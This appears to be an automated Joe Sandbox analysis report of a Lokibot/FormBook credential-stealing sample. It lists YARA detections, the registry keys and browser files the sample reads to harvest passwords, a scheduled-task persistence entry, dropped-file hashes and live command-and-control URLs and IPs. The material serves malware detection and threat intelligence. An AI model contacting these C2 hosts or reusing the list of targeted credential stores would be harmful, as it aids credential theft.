Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Queries volume information: C:\Users\user\AppData\Roaming\aWBoUwiux.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LEmJJ87mUQ.exe PID: 5016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aWBoUwiux.exe PID: 5572, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000008.00000002.2395876159.00000000030A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: PopPassword		8_2_0040D069
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: SmtpPassword		8_2_0040D069

Source: Yara match	File source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	2 Credentials in Registry	13 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	4 Obfuscated Files or Information	Security Account Manager	121 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Scheduled Task/Job	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	311 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
LEmJJ87mUQ.exe	55%	ReversingLabs	ByteCode-MSIL.Backdoor.FormBook
LEmJJ87mUQ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\aWBoUwiux.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\aWBoUwiux.exe	55%	ReversingLabs	ByteCode-MSIL.Backdoor.FormBook

Source	Detection	Scanner	Label	Link
http://touxzw.ir/sirr/five/fre.php	100%	Avira URL Cloud	malware
touxzw.ir/sirr/five/fre.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s-part-0033.t-0009.t-msedge.net	13.107.246.61	true	false		unknown
touxzw.ir	172.67.134.88	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://touxzw.ir/sirr/five/fre.php	true	Avira URL Cloud: malware	unknown
http://kbfvzoboss.bid/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high
touxzw.ir/sirr/five/fre.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	LEmJJ87mUQ.exe, 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, aWBoUwiux.exe, 00000009.00000002.2502975409.0000000002954000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	LEmJJ87mUQ.exe, aWBoUwiux.exe.0.dr	false	high
http://www.ibsensoftware.com/	RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, aWBoUwiux.exe, 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, aWBoUwiux.exe, 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/DataSet1.xsd	LEmJJ87mUQ.exe, aWBoUwiux.exe.0.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.134.88	touxzw.ir	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1567584
Start date and time:	2024-12-03 17:12:52 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LEmJJ87mUQ.exe renamed because original name is a hash value
Original Sample Name:	868444860f70d7825d5801e3ebdc8e9f0c5ffe72c3f42a938b7df98d50e10758.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@18/16@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 198 Number of non-executed functions: 13
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: LEmJJ87mUQ.exe

Simulations

Behavior and APIs

Time	Type	Description
11:14:04	API Interceptor	2x Sleep call for process: LEmJJ87mUQ.exe modified
11:14:11	API Interceptor	16x Sleep call for process: powershell.exe modified
11:14:13	API Interceptor	2x Sleep call for process: aWBoUwiux.exe modified
11:14:17	API Interceptor	1x Sleep call for process: RegSvcs.exe modified
11:14:26	API Interceptor	1x Sleep call for process: WerFault.exe modified
17:14:12	Task Scheduler	Run new task: aWBoUwiux path: C:\Users\user\AppData\Roaming\aWBoUwiux.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.134.88	http://www.bk8vn.vip/register?affid=17329	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0033.t-0009.t-msedge.net	https://aka.ms/LearnAboutSenderIdentification	Get hash	malicious	HTMLPhisher	Browse	13.107.246.61
	http://nxejt.polluxcastor.top	Get hash	malicious	Unknown	Browse	13.107.246.61
	https://mzvdazkxhcgohr.azureedge.net/7766j/?fbclid=IwY2xjawEYc-5leHRuA2FlbQEwAAEdG07X18DGPEURgpfyaSZY6plE3zyyIkcG5kokds9mnvD6i-BtmiU_lzIp_aem_ff88HnOUTFQFLZ993tisVw#	Get hash	malicious	Unknown	Browse	13.107.246.61
	https://www.imca-int.com/safety-events/loss-of-pressure-to-divers-primary-air-supply/#msdynttrid=gm4lm4Er39QjZQgkKZVlOHSa50W_Z4pWVjSg4GGAJjQ	Get hash	malicious	Unknown	Browse	13.107.246.61
	https://4smgswwi.r.us-west-2.awstrack.me/L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9917688bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541primmacy.com%252Fwinner%252F77663%252F%252FYmVja3kuYmFyY2tsZXlAY2xlYXJ3YXRlcnBhcGVyLmNvbQ==/1/0101019079f53360-ad062f3a-6c08-4c14-8569-269fb9f20297-000000/mkI5299-kBX9yyfDwVrQlybi5Wk=382	Get hash	malicious	HTMLPhisher	Browse	13.107.246.61
	umcu.org.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.61
touxzw.ir	lf1SPbZI3V.exe	Get hash	malicious	Lokibot	Browse	188.114.97.3
	zxalphamn.doc	Get hash	malicious	Lokibot	Browse	188.114.96.9
	DRAFT DOC2406656.bat.exe	Get hash	malicious	Lokibot	Browse	188.114.96.3
	Comprobante.PDF867564575869708776565434576897.exe	Get hash	malicious	Lokibot	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://odinling.es/sharep/sharepp/index1.html#info@securusmonitoring.com	Get hash	malicious	Unknown	Browse	172.67.131.129
	v58HgfB8Af.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://policy-business-page-service.com/meta-community-standard-s31000650257803499	Get hash	malicious	Unknown	Browse	104.17.245.203
	Audit(s) & Inspection(s) Due and Overdue Notification for Baez Rossy, Jafeth.eml	Get hash	malicious	Unknown	Browse	104.16.117.116
	zwW6sDt6hU.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	104.26.12.205
	Belegdetails Nr378-938-027181-PDF.html	Get hash	malicious	WinSearchAbuse	Browse	172.64.41.3
	e7lGwhCp7r.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	4z0JKnfc8L.xlsx	Get hash	malicious	Unknown	Browse	172.67.194.230
	Svku9pKypu.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	104.26.12.205
	K1_Chit_Form.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_aWBoUwiux.exe_8f1cdd7b3dbfff1ec2f4d9a68fbfa3e125112d5_25cd11fa_8875c584-d939-4445-a0c3-bdbed31d5e23\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.263677862537552
Encrypted:	false
SSDEEP:	192:RS00KFA0BU/aaOOJoNZrYVyjKzuiFRZ24IO8TH:g0h5BU/aaJRQKzuiFRY4IO8TH
MD5:	E82FEDD489BC876D316732B3B01051B8
SHA1:	A84968F3F3B86E75D5024AD82134A6BFD04AD9BC
SHA-256:	3A1166C6C8FD88F5CB493091FBE25141F234BC18CFAC3F4101D47E1FE09DFCD8
SHA-512:	3BB0F5C8F7CE23F1A392E7CFAF2969BA415C2EB05DDD143B5634C4D358CE26F2909CE144AC8D904D984E0DC0CB61E99B89A0AFF68728BBA6FC436E866DB4801B
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.7.1.6.0.6.1.4.2.2.1.3.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.7.1.6.0.6.2.2.8.1.5.7.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.8.7.5.c.5.8.4.-.d.9.3.9.-.4.4.4.5.-.a.0.c.3.-.b.d.b.e.d.3.1.d.5.e.2.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.d.e.3.4.c.8.3.-.e.c.6.0.-.4.9.4.d.-.a.1.a.3.-.d.b.c.2.f.4.5.f.a.2.4.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.a.W.B.o.U.w.i.u.x...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.z.d.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.c.4.-.0.0.0.1.-.0.0.1.4.-.1.8.f.e.-.e.f.6.3.9.e.4.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.d.0.a.7.f.a.a.d.e.4.9.0.6.8.f.1.e.7.b.8.9.2.6.1.5.e.1.3.1.8.0.0.0.0.0.0.0.0.!.0.0.0.0.c.2.d.e.e.6.5.f.d.0.b.2.2.5.e.9.e.c.f.1.e.a.7.1.8.d.1.0.1.5.3.5.9.f.7.1.3.2.c.e.!.a.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB83E.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Dec 3 16:14:21 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	355460
Entropy (8bit):	4.141420093224849
Encrypted:	false
SSDEEP:	3072:OImMPJ84uEqdLViuDFU7pNyDJYCLTgGsoySxuJ+EdP:OIBR84QVTDFEyDJxTgDSC
MD5:	722A0C8945B5A92AE987C9A1945B86E1
SHA1:	65AA70FBAE5E7E1A4FC215BA1A7DE14C5CF68F7B
SHA-256:	971E2D84766709723D0F7A5AF081AFB8A12E8D41C654FBEA505347E627C5C7F7
